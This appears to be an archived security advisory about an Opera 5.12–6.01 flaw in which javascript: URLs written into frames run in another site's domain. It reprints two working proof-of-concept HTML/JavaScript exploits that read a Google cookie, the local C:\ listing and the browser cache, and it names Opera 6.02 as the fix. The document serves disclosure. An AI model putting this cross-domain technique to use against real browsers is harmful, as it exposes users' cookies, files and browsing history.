|
COMMAND Opera we browser javascript protocol permit to read cookies/filesystem/cache SYSTEMS AFFECTED At least Opera 6.01, 6.0, 5.12 PROBLEM In Andreas Sandblad [sandblad@acc.umu.se] advisory [#6] : _ _ o\' \\,=./ `o (o o) ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- Opera allows the location of a frame to be overwritten by an url containing the javascript protocoll. The javascript code will be operating in the same domain as the url that was overwritten. Thus we can read cookies from other domains, local file structure and private information from the cache (history of links visited). EXPLOIT I: ========== The following exploit has been tested to work on Opera 6.01, 6.0 (win). It will not work on 5.x because it requires the iframe feature. ------------------- CUT HERE ----------------------------------- <iframe name=cookie src=\"http://www.google.com/\" height=0 width=0></iframe> <iframe name=files src=\"file://c:/\" height=0 width=0></iframe> <iframe name=cache src=\"opera:cache\" height=0 width=0></iframe><br> <a href=\"javascript:readCookie()\">Read google cookie</a><br> <a href=\"javascript:readFiles()\">Read c:/ structure (win)</a><br> <a href=\"javascript:readCache()\">Read links in cache</a><br> <script> function readCookie(){ cookie.location=\"javascript:alert(document.cookie)\"; } function readFiles(){ t = \'javascript:s=\"\";l=document.links;\'; t+= \'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);\'; files.location = t; } function readCache(){ t = \'javascript:s=\"\";l=document.links;\'; t+= \'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);\'; cache.location = t; } </script> ------------------- CUT HERE ----------------------------------- EXPLOIT II: =========== For versions of Opera not supporting the iframe tag the exploit must be done using the frame tag instead. The following exploit has been tested on Opera 6.01, 6.0, 5.12 (win). ------------------- CUT HERE ----------------------------------- <HTML> <FRAMESET ROWS=\"100%,0,0,0\"> <FRAME SRC=\"payload.html\"> <FRAME NAME=\"cache\" src=\"opera:cache\" noresize> <FRAME NAME=\"files\" src=\"file:///c:/\" noresize> <FRAME NAME=\"cookie\" src=\"http://www.google.com/\" noresize> </FRAMESET> </HTML> ------------------- CUT HERE ----------------------------------- payload.html: ------------------- CUT HERE ----------------------------------- <a href=\"javascript:alert(document.cookie)\" target=\"cookie\">Google cookie</a><br> <a href=\"javascript:alert(document.links.item(0))\" target=\"cache\">First item in cache</a><br> <a href=\"javascript:alert(document.links.item(1))\" target=\"files\">First file/directory in c:\\ (win)</a> ------------------- CUT HERE ----------------------------------- SOLUTION Get Opera 6.02 : http://www.opera.com/